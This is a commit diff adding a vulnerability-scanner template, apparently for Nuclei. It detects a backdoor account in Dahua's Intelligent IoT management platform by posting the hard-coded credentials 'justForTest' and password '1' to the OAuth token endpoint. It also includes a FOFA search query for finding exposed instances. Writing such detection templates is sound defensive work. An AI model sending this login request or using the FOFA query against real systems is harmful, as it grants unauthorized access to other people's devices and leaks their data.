Create dahua-icc-backdoor-user.yaml

http/vulnerabilities/dahua/dahua-icc-backdoor-user.yaml

@@ -0,0 +1,37 @@
+id: dahua-icc-backdoor-user
+
+info:
+  name: Dahua Intelligent IoT - User Login
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    There is a vulnerability in the user login interface /evo-apigw/evo-oauth/oauth/token of Zhejiang Dahua Technology Co., Ltd. Intelligent IoT Integrated Management Platform. Users can successfully log in to the platform using justForTest/any password, causing information leakage.
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: icon_hash="-1935899595"body="*客户端会小于800*"
+  tags: dahua,info-leak,backdoor
+
+http:
+  - raw:
+      - |
+        POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"success":'
+          - '"access_token":'
+          - '"token_type":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'